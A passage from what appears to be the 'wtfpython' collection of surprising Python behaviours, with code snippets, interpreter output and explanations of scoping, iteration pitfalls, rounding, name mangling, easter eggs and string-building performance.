+= 1 return a ``` 2\. ```py def some_closure_func(): a = 1 def some_inner_func(): return a return some_inner_func() def another_closure_func(): a = 1 def another_inner_func(): a += 1 return a return another_inner_func() ``` **Output:** ```py >>> some_func() 1 >>> another_func() UnboundLocalError: local variable 'a' referenced before assignment >>> some_closure_func() 1 >>> another_closure_func() UnboundLocalError: local variable 'a' referenced before assignment ``` #### 💡 Explanation: * When you make an assignment to a variable in scope, it becomes local to that scope. So `a` becomes local to the scope of `another_func`, but it has not been initialized previously in the same scope, which throws an error. * To modify the outer scope variable `a` in `another_func`, we have to use the `global` keyword. ```py def another_func() global a a += 1 return a ``` **Output:** ```py >>> another_func() 2 ``` * In `another_closure_func`, `a` becomes local to the scope of `another_inner_func`, but it has not been initialized previously in the same scope, which is why it throws an error. * To modify the outer scope variable `a` in `another_inner_func`, use the `nonlocal` keyword. The nonlocal statement is used to refer to variables defined in the nearest outer (excluding the global) scope. ```py def another_func(): a = 1 def another_inner_func(): nonlocal a a += 1 return a return another_inner_func() ``` **Output:** ```py >>> another_func() 2 ``` * The keywords `global` and `nonlocal` tell the python interpreter to not declare new variables and look them up in the corresponding outer scopes. * Read [this](https://sebastianraschka.com/Articles/2014_python_scope_and_namespaces.html) short but an awesome guide to learn more about how namespaces and scope resolution works in Python. --- ### ▶ Deleting a list item while iterating <!-- Example ID: 4cc52d4e-d42b-4e09-b25f-fbf5699b7d4e ---> ```py list_1 = [1, 2, 3, 4] list_2 = [1, 2, 3, 4] list_3 = [1, 2, 3, 4] list_4 = [1, 2, 3, 4] for idx, item in enumerate(list_1): del item for idx, item in enumerate(list_2): list_2.remove(item) for idx, item in enumerate(list_3[:]): list_3.remove(item) for idx, item in enumerate(list_4): list_4.pop(idx) ``` **Output:** ```py >>> list_1 [1, 2, 3, 4] >>> list_2 [2, 4] >>> list_3 [] >>> list_4 [2, 4] ``` Can you guess why the output is `[2, 4]`? #### 💡 Explanation: * It's never a good idea to change the object you're iterating over. The correct way to do so is to iterate over a copy of the object instead, and `list_3[:]` does just that. ```py >>> some_list = [1, 2, 3, 4] >>> id(some_list) 139798789457608 >>> id(some_list[:]) # Notice that python creates new object for sliced list. 139798779601192 ``` **Difference between `del`, `remove`, and `pop`:** * `del var_name` just removes the binding of the `var_name` from the local or global namespace (That's why the `list_1` is unaffected). * `remove` removes the first matching value, not a specific index, raises `ValueError` if the value is not found. * `pop` removes the element at a specific index and returns it, raises `IndexError` if an invalid index is specified. **Why the output is `[2, 4]`?** - The list iteration is done index by index, and when we remove `1` from `list_2` or `list_4`, the contents of the lists are now `[2, 3, 4]`. The remaining elements are shifted down, i.e., `2` is at index 0, and `3` is at index 1. Since the next iteration is going to look at index 1 (which is the `3`), the `2` gets skipped entirely. A similar thing will happen with every alternate element in the list sequence. * Refer to this StackOverflow [thread](https://stackoverflow.com/questions/45946228/what-happens-when-you-try-to-delete-a-list-element-while-iterating-over-it) explaining the example * See also this nice StackOverflow [thread](https://stackoverflow.com/questions/45877614/how-to-change-all-the-dictionary-keys-in-a-for-loop-with-d-items) for a similar example related to dictionaries in Python. --- ### ▶ Lossy zip of iterators * <!-- Example ID: c28ed154-e59f-4070-8eb6-8967a4acac6d ---> ```py >>> numbers = list(range(7)) >>> numbers [0, 1, 2, 3, 4, 5, 6] >>> first_three, remaining = numbers[:3], numbers[3:] >>> first_three, remaining ([0, 1, 2], [3, 4, 5, 6]) >>> numbers_iter = iter(numbers) >>> list(zip(numbers_iter, first_three)) [(0, 0), (1, 1), (2, 2)] # so far so good, let's zip the remaining >>> list(zip(numbers_iter, remaining)) [(4, 3), (5, 4), (6, 5)] ``` Where did element `3` go from the `numbers` list? #### 💡 Explanation: - From Python [docs](https://docs.python.org/3.3/library/functions.html#zip), here's an approximate implementation of zip function, ```py def zip(*iterables): sentinel = object() iterators = [iter(it) for it in iterables] while iterators: result = [] for it in iterators: elem = next(it, sentinel) if elem is sentinel: return result.append(elem) yield tuple(result) ``` - So the function takes in arbitrary number of iterable objects, adds each of their items to the `result` list by calling the `next` function on them, and stops whenever any of the iterable is exhausted. - The caveat here is when any iterable is exhausted, the existing elements in the `result` list are discarded. That's what happened with `3` in the `numbers_iter`. - The correct way to do the above using `zip` would be, ```py >>> numbers = list(range(7)) >>> numbers_iter = iter(numbers) >>> list(zip(first_three, numbers_iter)) [(0, 0), (1, 1), (2, 2)] >>> list(zip(remaining, numbers_iter)) [(3, 3), (4, 4), (5, 5), (6, 6)] ``` The first argument of zip should be the one with fewest elements. --- ### ▶ Loop variables leaking out! <!-- Example ID: ccec7bf6-7679-4963-907a-1cd8587be9ea ---> 1\. ```py for x in range(7): if x == 6: print(x, ': for x inside loop') print(x, ': x in global') ``` **Output:** ```py 6 : for x inside loop 6 : x in global ``` But `x` was never defined outside the scope of for loop... 2\. ```py # This time let's initialize x first x = -1 for x in range(7): if x == 6: print(x, ': for x inside loop') print(x, ': x in global') ``` **Output:** ```py 6 : for x inside loop 6 : x in global ``` 3\. **Output (Python 2.x):** ```py >>> x = 1 >>> print([x for x in range(5)]) [0, 1, 2, 3, 4] >>> print(x) 4 ``` **Output (Python 3.x):** ```py >>> x = 1 >>> print([x for x in range(5)]) [0, 1, 2, 3, 4] >>> print(x) 1 ``` #### 💡 Explanation: - In Python, for-loops use the scope they exist in and leave their defined loop-variable behind. This also applies if we explicitly defined the for-loop variable in the global namespace before. In this case, it will rebind the existing variable. - The differences in the output of Python 2.x and Python 3.x interpreters for list comprehension example can be explained by following change documented in [What’s New In Python 3.0](https://docs.python.org/3/whatsnew/3.0.html) changelog: > "List comprehensions no longer support the syntactic form `[... for var in item1, item2, ...]`. Use `[... for var in (item1, item2, ...)]` instead. Also, note that list comprehensions have different semantics: they are closer to syntactic sugar for a generator expression inside a `list()` constructor, and in particular, the loop control variables are no longer leaked into the surrounding scope." --- ### ▶ Beware of default mutable arguments! <!-- Example ID: 7d42dade-e20d-4a7b-9ed7-16fb58505fe9 ---> ```py def some_func(default_arg=[]): default_arg.append("some_string") return default_arg ``` **Output:** ```py >>> some_func() ['some_string'] >>> some_func() ['some_string', 'some_string'] >>> some_func([]) ['some_string'] >>> some_func() ['some_string', 'some_string', 'some_string'] ``` #### 💡 Explanation: - The default mutable arguments of functions in Python aren't really initialized every time you call the function. Instead, the recently assigned value to them is used as the default value. When we explicitly passed `[]` to `some_func` as the argument, the default value of the `default_arg` variable was not used, so the function returned as expected. ```py def some_func(default_arg=[]): default_arg.append("some_string") return default_arg ``` **Output:** ```py >>> some_func.__defaults__ #This will show the default argument values for the function ([],) >>> some_func() >>> some_func.__defaults__ (['some_string'],) >>> some_func() >>> some_func.__defaults__ (['some_string', 'some_string'],) >>> some_func([]) >>> some_func.__defaults__ (['some_string', 'some_string'],) ``` - A common practice to avoid bugs due to mutable arguments is to assign `None` as the default value and later check if any value is passed to the function corresponding to that argument. Example: ```py def some_func(default_arg=None): if default_arg is None: default_arg = [] default_arg.append("some_string") return default_arg ``` --- ### ▶ Catching the Exceptions <!-- Example ID: b5ca5e6a-47b9-4f69-9375-cda0f8c6755d ---> ```py some_list = [1, 2, 3] try: # This should raise an ``IndexError`` print(some_list[4]) except IndexError, ValueError: print("Caught!") try: # This should raise a ``ValueError`` some_list.remove(4) except IndexError, ValueError: print("Caught again!") ``` **Output (Python 2.x):** ```py Caught! ValueError: list.remove(x): x not in list ``` **Output (Python 3.x):** ```py File "<input>", line 3 except IndexError, ValueError: ^ SyntaxError: invalid syntax ``` #### 💡 Explanation * To add multiple Exceptions to the except clause, you need to pass them as parenthesized tuple as the first argument. The second argument is an optional name, which when supplied will bind the Exception instance that has been raised. Example, ```py some_list = [1, 2, 3] try: # This should raise a ``ValueError`` some_list.remove(4) except (IndexError, ValueError), e: print("Caught again!") print(e) ``` **Output (Python 2.x):** ``` Caught again! list.remove(x): x not in list ``` **Output (Python 3.x):** ```py File "<input>", line 4 except (IndexError, ValueError), e: ^ IndentationError: unindent does not match any outer indentation level ``` * Separating the exception from the variable with a comma is deprecated and does not work in Python 3; the correct way is to use `as`. Example, ```py some_list = [1, 2, 3] try: some_list.remove(4) except (IndexError, ValueError) as e: print("Caught again!") print(e) ``` **Output:** ``` Caught again! list.remove(x): x not in list ``` --- ### ▶ Same operands, different story! <!-- Example ID: ca052cdf-dd2d-4105-b936-65c28adc18a0 ---> 1\. ```py a = [1, 2, 3, 4] b = a a = a + [5, 6, 7, 8] ``` **Output:** ```py >>> a [1, 2, 3, 4, 5, 6, 7, 8] >>> b [1, 2, 3, 4] ``` 2\. ```py a = [1, 2, 3, 4] b = a a += [5, 6, 7, 8] ``` **Output:** ```py >>> a [1, 2, 3, 4, 5, 6, 7, 8] >>> b [1, 2, 3, 4, 5, 6, 7, 8] ``` #### 💡 Explanation: * `a += b` doesn't always behave the same way as `a = a + b`. Classes *may* implement the *`op=`* operators differently, and lists do this. * The expression `a = a + [5,6,7,8]` generates a new list and sets `a`'s reference to that new list, leaving `b` unchanged. * The expression `a += [5,6,7,8]` is actually mapped to an "extend" function that operates on the list such that `a` and `b` still point to the same list that has been modified in-place. --- ### ▶ Name resolution ignoring class scope <!-- Example ID: 03f73d96-151c-4929-b0a8-f74430788324 ---> 1\. ```py x = 5 class SomeClass: x = 17 y = (x for i in range(10)) ``` **Output:** ```py >>> list(SomeClass.y)[0] 5 ``` 2\. ```py x = 5 class SomeClass: x = 17 y = [x for i in range(10)] ``` **Output (Python 2.x):** ```py >>> SomeClass.y[0] 17 ``` **Output (Python 3.x):** ```py >>> SomeClass.y[0] 5 ``` #### 💡 Explanation - Scopes nested inside class definition ignore names bound at the class level. - A generator expression has its own scope. - Starting from Python 3.X, list comprehensions also have their own scope. --- ### ▶ Rounding like a banker * Let's implement a naive function to get the middle element of a list: ```py def get_middle(some_list): mid_index = round(len(some_list) / 2) return some_list[mid_index - 1] ``` **Python 3.x:** ```py >>> get_middle([1]) # looks good 1 >>> get_middle([1,2,3]) # looks good 2 >>> get_middle([1,2,3,4,5]) # huh? 2 >>> len([1,2,3,4,5]) / 2 # good 2.5 >>> round(len([1,2,3,4,5]) / 2) # why? 2 ``` It seems as though Python rounded 2.5 to 2. #### 💡 Explanation: - This is not a float precision error, in fact, this behavior is intentional. Since Python 3.0, `round()` uses [banker's rounding](https://en.wikipedia.org/wiki/Rounding#Rounding_half_to_even) where .5 fractions are rounded to the nearest **even** number: ```py >>> round(0.5) 0 >>> round(1.5) 2 >>> round(2.5) 2 >>> import numpy # numpy does the same >>> numpy.round(0.5) 0.0 >>> numpy.round(1.5) 2.0 >>> numpy.round(2.5) 2.0 ``` - This is the recommended way to round .5 fractions as described in [IEEE 754](https://en.wikipedia.org/wiki/IEEE_754#Rounding_rules). However, the other way (round away from zero) is taught in school most of the time, so banker's rounding is likely not that well known. Furthermore, some of the most popular programming languages (for example: JavaScript, Java, C/C++, Ruby, Rust) do not use banker's rounding either. Therefore, this is still quite special to Python and may result in confusion when rounding fractions. - See the [round() docs](https://docs.python.org/3/library/functions.html#round) or [this stackoverflow thread](https://stackoverflow.com/questions/10825926/python-3-x-rounding-behavior) for more information. - Note that `get_middle([1])` only returned 1 because the index was `round(0.5) - 1 = 0 - 1 = -1`, returning the last element in the list. --- ### ▶ Needles in a Haystack * <!-- Example ID: 52a199b1-989a-4b28-8910-dff562cebba9 ---> I haven't met even a single experience Pythonist till date who has not come across one or more of the following scenarios, 1\. ```py x, y = (0, 1) if True else None, None ``` **Output:** ```py >>> x, y # expected (0, 1) ((0, 1), None) ``` 2\. ```py t = ('one', 'two') for i in t: print(i) t = ('one') for i in t: print(i) t = () print(t) ``` **Output:** ```py one two o n e tuple() ``` 3\. ``` ten_words_list = [ "some", "very", "big", "list", "that" "consists", "of", "exactly", "ten", "words" ] ``` **Output** ```py >>> len(ten_words_list) 9 ``` 4\. Not asserting strongly enough ```py a = "python" b = "javascript" ``` **Output:** ```py # An assert statement with an assertion failure message. >>> assert(a == b, "Both languages are different") # No AssertionError is raised ``` 5\. ```py some_list = [1, 2, 3] some_dict = { "key_1": 1, "key_2": 2, "key_3": 3 } some_list = some_list.append(4) some_dict = some_dict.update({"key_4": 4}) ``` **Output:** ```py >>> print(some_list) None >>> print(some_dict) None ``` 6\. ```py def some_recursive_func(a): if a[0] == 0: return a[0] -= 1 some_recursive_func(a) return a def similar_recursive_func(a): if a == 0: return a a -= 1 similar_recursive_func(a) return a ``` **Output:** ```py >>> some_recursive_func([5, 0]) [0, 0] >>> similar_recursive_func(5) 4 ``` #### 💡 Explanation: * For 1, the correct statement for expected behavior is `x, y = (0, 1) if True else (None, None)`. * For 2, the correct statement for expected behavior is `t = ('one',)` or `t = 'one',` (missing comma) otherwise the interpreter considers `t` to be a `str` and iterates over it character by character. * `()` is a special token and denotes empty `tuple`. * In 3, as you might have already figured out, there's a missing comma after 5th element (`"that"`) in the list. So by implicit string literal concatenation, ```py >>> ten_words_list ['some', 'very', 'big', 'list', 'thatconsists', 'of', 'exactly', 'ten', 'words'] ``` * No `AssertionError` was raised in 4th snippet because instead of asserting the individual expression `a == b`, we're asserting entire tuple. The following snippet will clear things up, ```py >>> a = "python" >>> b = "javascript" >>> assert a == b Traceback (most recent call last): File "<stdin>", line 1, in <module> AssertionError >>> assert (a == b, "Values are not equal") <stdin>:1: SyntaxWarning: assertion is always true, perhaps remove parentheses? >>> assert a == b, "Values are not equal" Traceback (most recent call last): File "<stdin>", line 1, in <module> AssertionError: Values are not equal ``` * As for the fifth snippet, most methods that modify the items of sequence/mapping objects like `list.append`, `dict.update`, `list.sort`, etc. modify the objects in-place and return `None`. The rationale behind this is to improve performance by avoiding making a copy of the object if the operation can be done in-place (Referred from [here](https://docs.python.org/3/faq/design.html#why-doesn-t-list-sort-return-the-sorted-list)). * Last one should be fairly obvious, mutable object (like `list`) can be altered in the function, and the reassignment of an immutable (`a -= 1`) is not an alteration of the value. * Being aware of these nitpicks can save you hours of debugging effort in the long run. --- ### ▶ Splitsies * <!-- Example ID: ec3168ba-a81a-4482-afb0-691f1cc8d65a ---> ```py >>> 'a'.split() ['a'] # is same as >>> 'a'.split(' ') ['a'] # but >>> len(''.split()) 0 # isn't the same as >>> len(''.split(' ')) 1 ``` #### 💡 Explanation: - It might appear at first that the default separator for split is a single space `' '`, but as per the [docs](https://docs.python.org/3/library/stdtypes.html#str.split) > If sep is not specified or is `None`, a different splitting algorithm is applied: runs of consecutive whitespace are regarded as a single separator, and the result will contain no empty strings at the start or end if the string has leading or trailing whitespace. Consequently, splitting an empty string or a string consisting of just whitespace with a None separator returns `[]`. > If sep is given, consecutive delimiters are not grouped together and are deemed to delimit empty strings (for example, `'1,,2'.split(',')` returns `['1', '', '2']`). Splitting an empty string with a specified separator returns `['']`. - Noticing how the leading and trailing whitespaces are handled in the following snippet will make things clear, ```py >>> ' a '.split(' ') ['', 'a', ''] >>> ' a '.split() ['a'] >>> ''.split(' ') [''] ``` --- ### ▶ Wild imports * <!-- Example ID: 83deb561-bd55-4461-bb5e-77dd7f411e1c ---> <!-- read-only --> ```py # File: module.py def some_weird_name_func_(): print("works!") def _another_weird_name_func(): print("works!") ``` **Output** ```py >>> from module import * >>> some_weird_name_func_() "works!" >>> _another_weird_name_func() Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name '_another_weird_name_func' is not defined ``` #### 💡 Explanation: - It is often advisable to not use wildcard imports. The first obvious reason for this is, in wildcard imports, the names with a leading underscore don't get imported. This may lead to errors during runtime. - Had we used `from ... import a, b, c` syntax, the above `NameError` wouldn't have occurred. ```py >>> from module import some_weird_name_func_, _another_weird_name_func >>> _another_weird_name_func() works! ``` - If you really want to use wildcard imports, then you'd have to define the list `__all__` in your module that will contain a list of public objects that'll be available when we do wildcard imports. ```py __all__ = ['_another_weird_name_func'] def some_weird_name_func_(): print("works!") def _another_weird_name_func(): print("works!") ``` **Output** ```py >>> _another_weird_name_func() "works!" >>> some_weird_name_func_() Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'some_weird_name_func_' is not defined ``` --- ### ▶ All sorted? * <!-- Example ID: e5ff1eaf-8823-4738-b4ce-b73f7c9d5511 --> ```py >>> x = 7, 8, 9 >>> sorted(x) == x False >>> sorted(x) == sorted(x) True >>> y = reversed(x) >>> sorted(y) == sorted(y) False ``` #### 💡 Explanation: - The `sorted` method always returns a list, and comparing lists and tuples always returns `False` in Python. - ```py >>> [] == tuple() False >>> x = 7, 8, 9 >>> type(x), type(sorted(x)) (tuple, list) ``` - Unlike `sorted`, the `reversed` method returns an iterator. Why? Because sorting requires the iterator to be either modified in-place or use an extra container (a list), whereas reversing can simply work by iterating from the last index to the first. - So during comparison `sorted(y) == sorted(y)`, the first call to `sorted()` will consume the iterator `y`, and the next call will just return an empty list. ```py >>> x = 7, 8, 9 >>> y = reversed(x) >>> sorted(y), sorted(y) ([7, 8, 9], []) ``` --- ### ▶ Midnight time doesn't exist? <!-- Example ID: 1bce8294-5619-4d70-8ce3-fe0bade690d1 ---> ```py from datetime import datetime midnight = datetime(2018, 1, 1, 0, 0) midnight_time = midnight.time() noon = datetime(2018, 1, 1, 12, 0) noon_time = noon.time() if midnight_time: print("Time at midnight is", midnight_time) if noon_time: print("Time at noon is", noon_time) ``` **Output (< 3.5):** ```py ('Time at noon is', datetime.time(12, 0)) ``` The midnight time is not printed. #### 💡 Explanation: Before Python 3.5, the boolean value for `datetime.time` object was considered to be `False` if it represented midnight in UTC. It is error-prone when using the `if obj:` syntax to check if the `obj` is null or some equivalent of "empty." --- --- ## Section: The Hidden treasures! This section contains a few lesser-known and interesting things about Python that most beginners like me are unaware of (well, not anymore). ### ▶ Okay Python, Can you make me fly? <!-- Example ID: a92f3645-1899-4d50-9721-0031be4aec3f ---> Well, here you go ```py import antigravity ``` **Output:** Sshh... It's a super-secret. #### 💡 Explanation: + `antigravity` module is one of the few easter eggs released by Python developers. + `import antigravity` opens up a web browser pointing to the [classic XKCD comic](https://xkcd.com/353/) about Python. + Well, there's more to it. There's **another easter egg inside the easter egg**. If you look at the [code](https://github.com/python/cpython/blob/master/Lib/antigravity.py#L7-L17), there's a function defined that purports to implement the [XKCD's geohashing algorithm](https://xkcd.com/426/). --- ### ▶ `goto`, but why? <!-- Example ID: 2aff961e-7fa5-4986-a18a-9e5894bd89fe ---> ```py from goto import goto, label for i in range(9): for j in range(9): for k in range(9): print("I am trapped, please rescue!") if k == 2: goto .breakout # breaking out from a deeply nested loop label .breakout print("Freedom!") ``` **Output (Python 2.3):** ```py I am trapped, please rescue! I am trapped, please rescue! Freedom! ``` #### 💡 Explanation: - A working version of `goto` in Python was [announced](https://mail.python.org/pipermail/python-announce-list/2004-April/002982.html) as an April Fool's joke on 1st April 2004. - Current versions of Python do not have this module. - Although it works, but please don't use it. Here's the [reason](https://docs.python.org/3/faq/design.html#why-is-there-no-goto) to why `goto` is not present in Python. --- ### ▶ Brace yourself! <!-- Example ID: 5c0c75f2-ddd9-4da3-ba49-c4be7ec39acf ---> If you are one of the people who doesn't like using whitespace in Python to denote scopes, you can use the C-style {} by importing, ```py from __future__ import braces ``` **Output:** ```py File "some_file.py", line 1 from __future__ import braces SyntaxError: not a chance ``` Braces? No way! If you think that's disappointing, use Java. Okay, another surprising thing, can you find where's the `SyntaxError` raised in `__future__` module [code](https://github.com/python/cpython/blob/master/Lib/__future__.py)? #### 💡 Explanation: + The `__future__` module is normally used to provide features from future versions of Python. The "future" in this specific context is however, ironic. + This is an easter egg concerned with the community's feelings on this issue. + The code is actually present [here](https://github.com/python/cpython/blob/025eb98dc0c1dc27404df6c544fc2944e0fa9f3a/Python/future.c#L49) in `future.c` file. + When the CPython compiler encounters a [future statement](https://docs.python.org/3.3/reference/simple_stmts.html#future-statements), it first runs the appropriate code in `future.c` before treating it as a normal import statement. --- ### ▶ Let's meet Friendly Language Uncle For Life <!-- Example ID: 6427fae6-e959-462d-85da-ce4c94ce41be ---> **Output (Python 3.x)** ```py >>> from __future__ import barry_as_FLUFL >>> "Ruby" != "Python" # there's no doubt about it File "some_file.py", line 1 "Ruby" != "Python" ^ SyntaxError: invalid syntax >>> "Ruby" <> "Python" True ``` There we go. #### 💡 Explanation: - This is relevant to [PEP-401](https://www.python.org/dev/peps/pep-0401/) released on April 1, 2009 (now you know, what it means). - Quoting from the PEP-401 > Recognized that the != inequality operator in Python 3.0 was a horrible, finger-pain inducing mistake, the FLUFL reinstates the <> diamond operator as the sole spelling. - There were more things that Uncle Barry had to share in the PEP; you can read them [here](https://www.python.org/dev/peps/pep-0401/). - It works well in an interactive environment, but it will raise a `SyntaxError` when you run via python file (see this [issue](https://github.com/satwikkansal/wtfpython/issues/94)). However, you can wrap the statement inside an `eval` or `compile` to get it working, ```py from __future__ import barry_as_FLUFL print(eval('"Ruby" <> "Python"')) ``` --- ### ▶ Even Python understands that love is complicated <!-- Example ID: b93cad9e-d341-45d1-999c-fcdce65bed25 ---> ```py import this ``` Wait, what's **this**? `this` is love :heart: **Output:** ``` The Zen of Python, by Tim Peters Beautiful is better than ugly. Explicit is better than implicit. Simple is better than complex. Complex is better than complicated. Flat is better than nested. Sparse is better than dense. Readability counts. Special cases aren't special enough to break the rules. Although practicality beats purity. Errors should never pass silently. Unless explicitly silenced. In the face of ambiguity, refuse the temptation to guess. There should be one-- and preferably only one --obvious way to do it. Although that way may not be obvious at first unless you're Dutch. Now is better than never. Although never is often better than *right* now. If the implementation is hard to explain, it's a bad idea. If the implementation is easy to explain, it may be a good idea. Namespaces are one honking great idea -- let's do more of those! ``` It's the Zen of Python! ```py >>> love = this >>> this is love True >>> love is True False >>> love is False False >>> love is not True or False True >>> love is not True or False; love is love # Love is complicated True ``` #### 💡 Explanation: * `this` module in Python is an easter egg for The Zen Of Python ([PEP 20](https://www.python.org/dev/peps/pep-0020)). * And if you think that's already interesting enough, check out the implementation of [this.py](https://hg.python.org/cpython/file/c3896275c0f6/Lib/this.py). Interestingly, **the code for the Zen violates itself** (and that's probably the only place where this happens). * Regarding the statement `love is not True or False; love is love`, ironic but it's self-explanatory (if not, please see the examples related to `is` and `is not` operators). --- ### ▶ Yes, it exists! <!-- Example ID: 4286db3d-1ea7-47c9-8fb6-a9a04cac6e49 ---> **The `else` clause for loops.** One typical example might be: ```py def does_exists_num(l, to_find): for num in l: if num == to_find: print("Exists!") break else: print("Does not exist") ``` **Output:** ```py >>> some_list = [1, 2, 3, 4, 5] >>> does_exists_num(some_list, 4) Exists! >>> does_exists_num(some_list, -1) Does not exist ``` **The `else` clause in exception handling.** An example, ```py try: pass except: print("Exception occurred!!!") else: print("Try block executed successfully...") ``` **Output:** ```py Try block executed successfully... ``` #### 💡 Explanation: - The `else` clause after a loop is executed only when there's no explicit `break` after all the iterations. You can think of it as a "nobreak" clause. - `else` clause after a try block is also called "completion clause" as reaching the `else` clause in a `try` statement means that the try block actually completed successfully. --- ### ▶ Ellipsis * <!-- Example ID: 969b7100-ab3d-4a7d-ad7d-a6be16181b2b ---> ```py def some_func(): Ellipsis ``` **Output** ```py >>> some_func() # No output, No Error >>> SomeRandomString Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'SomeRandomString' is not defined >>> Ellipsis Ellipsis ``` #### 💡 Explanation - In Python, `Ellipsis` is a globally available built-in object which is equivalent to `...`. ```py >>> ... Ellipsis ``` - Ellipsis can be used for several purposes, + As a placeholder for code that hasn't been written yet (just like `pass` statement) + In slicing syntax to represent the full slices in remaining direction ```py >>> import numpy as np >>> three_dimensional_array = np.arange(8).reshape(2, 2, 2) array([ [ [0, 1], [2, 3] ], [ [4, 5], [6, 7] ] ]) ``` So our `three_dimensional_array` is an array of array of arrays. Let's say we want to print the second element (index `1`) of all the innermost arrays, we can use Ellipsis to bypass all the preceding dimensions ```py >>> three_dimensional_array[:,:,1] array([[1, 3], [5, 7]]) >>> three_dimensional_array[..., 1] # using Ellipsis. array([[1, 3], [5, 7]]) ``` Note: this will work for any number of dimensions. You can even select slice in first and last dimension and ignore the middle ones this way (`n_dimensional_array[firs_dim_slice, ..., last_dim_slice]`) + In [type hinting](https://docs.python.org/3/library/typing.html) to indicate only a part of the type (like `(Callable[..., int]` or `Tuple[str, ...]`)) + You may also use Ellipsis as a default function argument (in the cases when you want to differentiate between the "no argument passed" and "None value passed" scenarios). --- ### ▶ Inpinity <!-- Example ID: ff473ea8-a3b1-4876-a6f0-4378aff790c1 ---> The spelling is intended. Please, don't submit a patch for this. **Output (Python 3.x):** ```py >>> infinity = float('infinity') >>> hash(infinity) 314159 >>> hash(float('-inf')) -314159 ``` #### 💡 Explanation: - Hash of infinity is 10⁵ x π. - Interestingly, the hash of `float('-inf')` is "-10⁵ x π" in Python 3, whereas "-10⁵ x e" in Python 2. --- ### ▶ Let's mangle <!-- Example ID: 37146d2d-9e67-43a9-8729-3c17934b910c ---> 1\. ```py class Yo(object): def __init__(self): self.__honey = True self.bro = True ``` **Output:** ```py >>> Yo().bro True >>> Yo().__honey AttributeError: 'Yo' object has no attribute '__honey' >>> Yo()._Yo__honey True ``` 2\. ```py class Yo(object): def __init__(self): # Let's try something symmetrical this time self.__honey__ = True self.bro = True ``` **Output:** ```py >>> Yo().bro True >>> Yo()._Yo__honey__ Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'Yo' object has no attribute '_Yo__honey__' ``` Why did `Yo()._Yo__honey` work? 3\. ```py _A__variable = "Some value" class A(object): def some_func(self): return __variable # not initialized anywhere yet ``` **Output:** ```py >>> A().__variable Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'A' object has no attribute '__variable' >>> A().some_func() 'Some value' ``` #### 💡 Explanation: * [Name Mangling](https://en.wikipedia.org/wiki/Name_mangling) is used to avoid naming collisions between different namespaces. * In Python, the interpreter modifies (mangles) the class member names starting with `__` (double underscore a.k.a "dunder") and not ending with more than one trailing underscore by adding `_NameOfTheClass` in front. * So, to access `__honey` attribute in the first snippet, we had to append `_Yo` to the front, which would prevent conflicts with the same name attribute defined in any other class. * But then why didn't it work in the second snippet? Because name mangling excludes the names ending with double underscores. * The third snippet was also a consequence of name mangling. The name `__variable` in the statement `return __variable` was mangled to `_A__variable`, which also happens to be the name of the variable we declared in the outer scope. * Also, if the mangled name is longer than 255 characters, truncation will happen. --- --- ## Section: Appearances are deceptive! ### ▶ Skipping lines? <!-- Example ID: d50bbde1-fb9d-4735-9633-3444b9d2f417 ---> **Output:** ```py >>> value = 11 >>> valuе = 32 >>> value 11 ``` Wut? **Note:** The easiest way to reproduce this is to simply copy the statements from the above snippet and paste them into your file/shell. #### 💡 Explanation Some non-Western characters look identical to letters in the English alphabet but are considered distinct by the interpreter. ```py >>> ord('е') # cyrillic 'e' (Ye) 1077 >>> ord('e') # latin 'e', as used in English and typed using standard keyboard 101 >>> 'е' == 'e' False >>> value = 42 # latin e >>> valuе = 23 # cyrillic 'e', Python 2.x interpreter would raise a `SyntaxError` here >>> value 42 ``` The built-in `ord()` function returns a character's Unicode [code point](https://en.wikipedia.org/wiki/Code_point), and different code positions of Cyrillic 'e' and Latin 'e' justify the behavior of the above example. --- ### ▶ Teleportation <!-- Example ID: edafe923-0c20-4315-b6e1-0c31abfc38f5 ---> ```py # `pip install numpy` first. import numpy as np def energy_send(x): # Initializing a numpy array np.array([float(x)]) def energy_receive(): # Return an empty numpy array return np.empty((), dtype=np.float).tolist() ``` **Output:** ```py >>> energy_send(123.456) >>> energy_receive() 123.456 ``` Where's the Nobel Prize? #### 💡 Explanation: * Notice that the numpy array created in the `energy_send` function is not returned, so that memory space is free to reallocate. * `numpy.empty()` returns the next free memory slot without reinitializing it. This memory spot just happens to be the same one that was just freed (usually, but not always). --- ### ▶ Well, something is fishy... <!-- Example ID: cb6a37c5-74f7-44ca-b58c-3b902419b362 ---> ```py def square(x): """ A simple function to calculate the square of a number by addition. """ sum_so_far = 0 for counter in range(x): sum_so_far = sum_so_far + x return sum_so_far ``` **Output (Python 2.x):** ```py >>> square(10) 10 ``` Shouldn't that be 100? **Note:** If you're not able to reproduce this, try running the file [mixed_tabs_and_spaces.py](/mixed_tabs_and_spaces.py) via the shell. #### 💡 Explanation * **Don't mix tabs and spaces!** The character just preceding return is a "tab", and the code is indented by multiple of "4 spaces" elsewhere in the example. * This is how Python handles tabs: > First, tabs are replaced (from left to right) by one to eight spaces such that the total number of characters up to and including the replacement is a multiple of eight <...> * So the "tab" at the last line of `square` function is replaced with eight spaces, and it gets into the loop. * Python 3 is kind enough to throw an error for such cases automatically. **Output (Python 3.x):** ```py TabError: inconsistent use of tabs and spaces in indentation ``` --- --- ## Section: Miscellaneous ### ▶ `+=` is faster <!-- Example ID: bfd19c60-a807-4a26-9598-4912b86ddb36 ---> ```py # using "+", three strings: >>> timeit.timeit("s1 = s1 + s2 + s3", setup="s1 = ' ' * 100000; s2 = ' ' * 100000; s3 = ' ' * 100000", number=100) 0.25748300552368164 # using "+=", three strings: >>> timeit.timeit("s1 += s2 + s3", setup="s1 = ' ' * 100000; s2 = ' ' * 100000; s3 = ' ' * 100000", number=100) 0.012188911437988281 ``` #### 💡 Explanation: + `+=` is faster than `+` for concatenating more than two strings because the first string (example, `s1` for `s1 += s2 + s3`) is not destroyed while calculating the complete string. --- ### ▶ Let's make a giant string! <!-- Example ID: c7a07424-63fe-4504-9842-8f3d334f28fc ---> ```py def add_string_with_plus(iters): s = "" for i in range(iters): s += "xyz" assert len(s) == 3*iters def add_bytes_with_plus(iters): s = b"" for i in range(iters): s += b"xyz" assert len(s) == 3*iters def add_string_with_format(iters): fs = "{}"*iters s = fs.format(*(["xyz"]*iters)) assert len(s) == 3*iters def add_string_with_join(iters): l = [] for i in range(iters): l.append("xyz") s = "".join(l) assert len(s) == 3*iters def convert_list_to_string(l, iters): s = "".join(l) assert len(s) == 3*iters 